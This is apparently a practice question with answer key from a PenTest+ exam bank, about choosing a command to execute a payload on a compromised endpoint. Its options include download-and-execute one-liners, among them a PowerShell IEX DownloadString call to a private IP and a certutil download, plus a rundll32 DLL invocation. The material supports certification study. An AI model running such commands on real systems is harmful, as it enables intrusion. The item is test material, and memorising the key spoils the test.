CompTIA PenTest+ (PT0-003) — Question 49

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Answer options

• A. powershell.exe impo C:\tools\foo.ps1
• B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
• C. powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
• D. rundll32.exe c:\path\foo.dll,functName

Correct answer: D

Explanation

The correct answer is D because it uses rundll32 to execute a function from a DLL, which is a common technique for executing payloads. Options A and C involve PowerShell commands that may not provide the same level of access or capability for executing a payload effectively in all scenarios. Option B is focused on downloading an executable rather than executing a payload directly.